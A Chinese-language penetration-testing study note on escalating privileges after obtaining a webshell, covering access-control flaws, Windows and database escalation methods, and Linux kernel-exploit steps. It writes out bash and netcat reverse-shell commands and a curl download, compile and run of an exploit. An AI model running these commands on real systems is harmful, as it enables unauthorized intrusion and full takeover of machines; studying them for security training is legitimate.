前提:拿到wbshell后做的事情
webshell 通常继承了web 用户的权限
通常情况下,web用户的权限是比较低的
权限提升
1:获取其他用户的访问权限,甚至是管理员。
! 水平权限提升(越权)(普通用户更改普通用户的帖子)
对一个论坛来说 :
超级管理员(管理所有)、版主(管理一版的帖子)、普通用户(管里自己的帖子)
A|B
!垂直权限提升(更改版主或超级管理员的贴子)
!如果以上两种情况,发生在web、App中
失效的访问控制:就是未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的账户、查看敏感文件、修改其他用户的数据、更改访问权限等。
对于系统来说,就是“提权”,目标是获取root/administrator的权限。
提权的分类: 水平权限提升、垂直权限提升
依据操作系统分类:
编译器:
windows系统:
提权方式:
操作系统漏洞提权:
步骤:1获取系统信息
命令是:systminfo
根据没有修补的补丁号码,直接在网上找 利用程序 网址:www.7kb.org/138.html
漏洞(系统漏洞msxx-xx)与补丁(kB)的对应关系
PR提权:win2003
MS09-012
巴西烤肉提权
2 直接用exp,exp就是编译好的针对某一漏洞的exe程序
第三方服务提权
就是数据库提权
分两种:1:MSSQL 提取
关键步骤:就是获取sa用户的密码
条件:数据库的端口、地址 sa sa用户的密码
2::MYSQL 提权
分两种:1:UDF 提权
2:MOF提权
其他数据库 VNC PCanywhere .........
linux系统:
自带的编译器:gcc
1:利用系统漏洞进行提权
一;了解目标操作系统的内核版本号,去查找对应的能提权的漏洞
命令:• cat /proc/version(系统版本信息)
• uname -a(内核查询)
• uname -mrs+-
• rpm -q kernel
• dmesg | grep Linux
• ls /boot | grep vmlinuz
1;shell反弹
监听端口 nc.exe -lvvp 4444
/bin/bash -i >& /dev/tcp/ip地址/4444(端口号) 0<&1
查找提权的漏洞
kali中:searchsploit+系统
下载提权exp.c
curl http://172.18.199.91/35370.c > exp.c
编译并且运行
gcc exp.c -o exploit -lpthread
./exploit
提权实战
1 如果对方windows系统,并且使用套件搭建服务,获取的webshell,即是system权限
常见的套件: xampp wamp phpstudy
内网渗透
1 nc shell 反弹
客户端首先执行 nc.exe -lvvp 777(端口号)
服务器端执行 nc.exe -e cmd.exe 远程IP地址 端口号